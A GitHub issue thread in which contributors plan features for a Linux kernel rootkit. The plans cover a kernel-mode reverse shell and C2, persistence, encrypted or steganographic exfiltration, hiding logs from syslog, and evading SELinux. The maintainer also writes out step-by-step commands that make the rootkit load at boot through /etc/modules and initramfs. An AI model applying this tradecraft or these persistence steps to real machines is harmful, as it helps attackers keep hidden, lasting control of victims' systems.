reveng_rtkit
reveng_rtkit copied to clipboard
reveng007
[*] Contributing on the TODO LIST
Hello! @reveng007 First of, nice project I have to say! Many great links and well structured 👏🏻.
Overview
I plan on contributing to this project, that is - I saw (both the Issues, and the TODO-List) you have made, some of them:
- system() like function (but in kernel)
- sockets (this one was a bit broad/confusing) - do you want it to be a reverse shell..?
- Among others.
I plan on contributing to all the TODO's, (as by the time writing, each Issue and TODO you have listed does not really seem impossible for me to achieve). Like, the adding a system() like function.
TODO 4# Sockets
This TODO I need to request some details before I dive in. It is unclear what you want to achieve.
Adding Linux Kernel Sockets to this LKM rootkit, so that this rootkit acts as an all-rounder. Both, as a LKM rootkit as well as stealthy C2 Server.
on both of these, what exactly do you want to achieve here?:
- "stealthy C2 Server."
- "this rootkit acts as an all-rounder."
TODO 5# Persistence
As well as, this one got me specifically interested into contributing, since this would be a great exercise:
Additional Idea
I have thought of some things to add to your project, some of them is included (but not lim. To):
- Cryptography, Obfuscation and Steganography.
- Cryptography - encryption & decryption (like, encrypting the
socketsso it's not sent inplain text..) - Obfuscation - This is pretty self explanatory.
- Steganography - if required by the user (that controls the rootkit), he or she will be able to choose to use Steganography as a extra-additional step for security. That is, when exfiltrating something (data, which might be a reverse shell, or something on those lines) It could work by hiding it in, normal pictures or just something else.
- Cryptography - encryption & decryption (like, encrypting the
Note these would take longer time to make but , still wanted to point them out.
Edit: I also thought of adding something related to kernel-mode shellcode execution, as it is something I have been working on now for some time. I will see if I have the time; if this would be something of interest.
Of course, it goes without saying - if 1 or more 'todos' is already done, please point them out so I don't reinvent the wheel.
Thank you.
Of course, it goes without saying - if 1 or more 'todos' is already done, please point them out so I don't reinvent the wheel.
Thank you.
No TODO list is actually done till now :)
No TODO list is actually done till now :)
edit: I will begin with the easiest one, the system() like function(but in kernel);
Thank you for fast reply and have a great continuing day!
Thanks a lot for the appreciation! 💯
Thanks again to you for showing interest in contributing to my project 😃
Overview:
- system() like function (but in kernel) just to open a new bash/sh prompt as I have mentioned earlier in the README file.
- sockets (this one was a bit broad/confusing) - do you want it to be a reverse shell..? Yes, a revshell but as kernel mode ;)
TODO 4# Sockets:
Rootkit will also act as a revshell (rather than kernel mode revshell) just to nullify the use of usermode revshell for long time just for being stealthy.
Allrounder meaning: funtionality of revshell + stealthy as LKM rootkit
TODO 5# Persistence:
Actually, I have no idea how to achieve this till now ;( Ig some assembly language will be needed to achieve this stuff...
Cryptography and Obfuscation are really dope idea :fire: but Steganography will be dependent upon the Scenario/environment of the Victim Machine, right?
"Note these would take longer time to make but , still wanted to point them out."
=> Not a problem at all man!!
Again thanks for providing a helping hand to me :)
"I also thought of adding something related to kernel-mode shellcode execution, as it is something I have been working on now for some time. I will see if I have the time; if this would be something of interest."
You are most welcome to add those if you want to. That would really help this project to attract more public attention!!
Thank you @loneicewolf 🤗 , have a nice day!!
No TODO list is actually done till now :)
edit: I will begin with the easiest one, the system() like function(but in kernel);
Thank you for fast reply and have a great continuing day!
I'm also excited about this 😄 Not a problem at all Thank u, same to u as well
No problems at all, with the Persistence "exercise" as I called it, I was meaning that I myself would do it; and make (I guess, another Pull Request when it's done)
On the Steganography step, I was a bit vague too, broadly speaking, it "can" be a picture, but it can also be just, a covert channel; whatever that might be can be another question (there is loads of methods to achieve this).
Then I guess I have nothing more to add - if there is anything else just write a new todo element or reply to me in any issue;
Have a nice day! And keep it up :)
Edit: adding footnotes (related links) as-to clarify what I meant by the Cryptography Obfuscation Steganography
https://embeddedsw.net/
https://embeddedsw.net/Randomness_Test_Home.html
https://embeddedsw.net/OpenPuff_Steganography_Home.html
https://embeddedsw.net/MultiObfuscator_Cryptography_Home.html
https://embeddedsw.net/libObfuscate_Cryptography_Home.html
https://embeddedsw.net/Cipher_Reference_Home.html
Btw, do u know how to make custom logger ?? Like when we inject it creates some logs right? So I wanted to create a custom logger which can log our kernel print, instead of syslog logging our rootkit's behaviour. Targeting for more OPSEC.
Or another idea was to use macros like, KERN_EMERG, KERN_ALERT from printk.h header which has lower log lvl than console log level so that those logs will not be logged by syslog, rather it will be shown in the console, like ctrl + shift + f5/f4 (i don't really remember that particular tty).
But we have to some how perform proxying of those outputs from console to our current terminal, that means those kernel prints will work like printf (in c) or like echo in bash
Did I make any sense?
Hi again @reveng007!
Thanks for additional reply;
Btw, do u know how to make custom logger ?? Like when we inject it creates some logs right? So I wanted to create a custom logger which can log our kernel print, instead of syslog logging our rootkit's behaviour. Targeting for more OPSEC.
Or another idea was to use macros like,
KERN_EMERG,KERN_ALERTfrom printk.h header which has lower log lvl than console log level so that those logs will not be logged by syslog, rather it will be shown in the console, likectrl + shift + f5/f4(i don't really remember that particulartty).But we have to some how perform proxying of those outputs from console to our current terminal, that means those kernel prints will work like
printf(in c) or likeechoin bashDid I make any sense?
Uhm, the last sentence is flawless - sorry I am having a bit trouble following what you try to say; I will try (below):
- You want to make a "logger" of some sort, (that, logs everything from what the operator does with the rootkit, what the rootkits output is, and so on) right?
- macros, like
KERN_ALERTto (according to your text - again, if I understand you correctly) - is to hide the output..?) if you want to hide the output, why not just comment it out? (or if you need the outputs but still don't want it to be "so plaintext" maybe log them somewhere else? Perhaps encrypted?) - "Proxy the outputs from console to current terminal" here I do not follow at all I think.. Do you want to redirect the output from something to something else..? Sorry. Please clarify
And, soon I will have to head home for the night, ill come back online tomorrow.
can you perhaps make an example of each of them (draw a diagram, or some example code) maybe in another language to demonstrate..? If it is difficult explaining. :)
I think I do understand the - logging the output to another tty - so you have to do the ctrl+shift+fX key (where X is 5,4,...,2,1.) to see the output, correct? If this is not a correct understanding I think you have to elaborate, sorry :)
Have a good night!
I think I do understand the - logging the output to another tty - so you have to do the
ctrl+shift+fXkey (whereXis 5,4,...,2,1.) to see the output, correct? If this is not a correct understanding I think you have to elaborate, sorry :)Have a good night!
You are right, exactly !
But the thing is, that will be quite hectic right?
Searching for the value of X in ctrl+shift+fX for every machine once it is injected into kernel. For every machine, that value of X is different if I remember correctly.
Same to u too! :)
- You want to make a "logger" of some sort, (that, logs everything from what the operator does with the rootkit, what the rootkits output is, and so on) right?
Yes
- macros, like KERN_ALERT to (according to your text - again, if I understand you correctly) - is to hide the output..?) if you want to hide the output, why not just comment it out? (or if you need the outputs but still don't want it to be "so plaintext" maybe log them somewhere else? Perhaps encrypted?)
If I comment out the Comment lines, then how will I know that those instructions got successfully executed in the kernel? Am I right? According to this link,
Any log messages with levels less than this (that is, of higher priority) will be printed to the console, whereas any messages with levels equal to or greater than this will not be displayed.
I'm talking about this! 3. "Proxy the outputs from console to current terminal" here I do not follow at all I think.. Do you want to redirect the output from something to something else..? Sorry. Please clarify
Exactly. I want to redirect the output from Console to current terminal we are having as Operator. Does this make sense now?
- And, soon I will have to head home for the night, ill come back online tomorrow.
Not a problem 👍🏼
- Can you perhaps make an example of each of them (draw a diagram, or some example code) maybe in another language to demonstrate..? If it is difficult explaining. :)
If more explanation is needed, pls feel free to ask me 👍🏼
Goodmorning!
Yes, thank you @reveng007 Ill check that link, I'm on train now so it will take awhile but; thanks for being patient and so (very) quick responding!
Goodmorning!
Yes, thank you @reveng007 Ill check that link, I'm on train now so it will take awhile but; thanks for being patient and so (very) quick responding!
Hey, not a problem. You are only helping me out by contributing to my project. So thanks to u :) @loneicewolf
Hello, @reveng007 now I have made up a kinda plan, I will as said be slow on this, not only because of various factors such as the diff.kernel version the rootkit is using, safe coding (since, even if we code in the kernel a rootkit, we should still strive to make it as "stable" and "reliable" ironically speaking as possible); and so on;
The Persistence
Regarding the Persistence step, a naive approach (I guess you & everyone else think of this first when thinking about rootkit persistence) is just, to "load it at startup" like any other loadable kernel module, (which, as a start might be just, placing a copy in a folder that has modules to load at boot); so I think the actual persistence wouldn't be so - complex - but the "exercise" here would be the steps required to make it harder to detect (relatively speaking).
Blog feedback
And I have checked your blog (comprehensive I have to tell you - keep it up! One minor improvement could be to make the subtitles more "visible" because I had to scroll quite lots to get to a part you refereed me to but other than that it's really well structured). :)
Wrap up
So, basically I will at times prepare (not at the same time , but one by one):
- [ ] The system() like function in the kernel;
- [ ] The Sockets (reverse shell, ...)
- [ ] The Persistence
- [ ] I will take on the Additional ideas (cryptography,obfuscation,steganography) to the last.
I wish you a nice continuing day! This will be a fun project to contribute to! 👍🏻
Yes, Safe coding is required but I guess before that we need our concepts to work. After that we should stabilize our code based on that.
Persistence
This can be helpful, although I don't have a good knowledge in asm, in this case it may require us the usage of kernel mode asm. link: https://programmer.group/inject-your-rootkit-code-into-a-linux-kernel-module.html
Yes, Our Target will be more stealth!
" "load it at startup" like any other loadable kernel module" is easy:
We can leverage `initramfs` to set up rootkit to load up automatically at boot time.
With sudo:
1. adding rootkit (without .ko) to /etc/modules
2. Copying rootkit LKM to: /lib/modules/5.15.0-58-generic/kernel/drivers/<any driver/module folder>
3. depmod -a
4. update-initramfs -u
Blog feedback:
Thanks a lot! Actually at that time I was totally noob, I didn't know anything about kernel, LKM, even the concept of OS and usermode C was unknown to me. I have made that comprehensive just to log my learning path. But at last I decided to make that public so that someone like me can learn creating rootkit from scratch even if they don't really have a knowledge of all those basics, without getting intimidated by other high level blogs/posts.
I have to find that out, that how to add those feature so that one click over a topic enables user to easily navigate to that particular topic.
Wrap Up:
In this section, I don;t really have to add anything, everything that we said is perfect! Except one thing, although it is my query. Do u have any idea how to do this?
- Hiding process files completely. Our hidden process file can be accessed to open/read. If someone does, ls
, they can easily open them. - capabilities to Evade SELinux.
I wish you a nice continuing day! This will be a fun project to contribute to! 👍🏻
Same to you my Man! 👍🏼
regarding the last 2 points, it depends, because "completely" is not possible. But I assume you mean as closest as possible to "complete". I mean, obviously nothing is perfect or 100% secure (this is obvious).
But - I mean, you could do some checks, instead of only "hiding a file that has a prefix" you can, "hide the file iff it contains some specific data" like, some metadata to match - for example the file is In a particular location, at a particular time, made by a particular user(and so on), or have some keyword inside of it. (this can be, whatever from a first line of random letters to some cipher or what it now might be) of course this is a extremely broad, thing - because there is loads of ways you can program a rootkit, or even just program 1 "thing";
so it depends on the situation very much.
Regarding the blog
Actually at that time I was totally noob, I didn't know anything about kernel, LKM, even the concept of OS and usermode C was unknown to me.
respect! Hard worker ^_^ we all begin somewhere and I don't like to use the word "noob" by the way; but Have a nice night! ☕
Update:
@reveng007 Hi!
this was quite the delay, I have to admit. I will hopefully begin very soon with the proof of concepts(as we always start with), then make it more stable. I have researched some topics, and looked into your blog (Because of various factors like as it was long and, a bit all-consuming to read, and so on - I had to re-write certain parts, on my side that is. I don't really have anything to contribute to the blog post, as I think it's quite well structured. And as you point out in this repo, this is not for the latest kernels, but a specific one.).
Briefly speaking, I have reviewed some stuff I would need in order to make all these contribution "points" (persistence, kernel-mode system() function, etc). And will begin with POCS very shortly.
You can close this if you want, as I will probably (excluding time) make new pull/issues for each "part". As I always do.
Wishes!
No worries... Take ur time... I also haven't got time to put in to Linux kernel...
Mostly spending time windows... Thanks again!
All the very best :)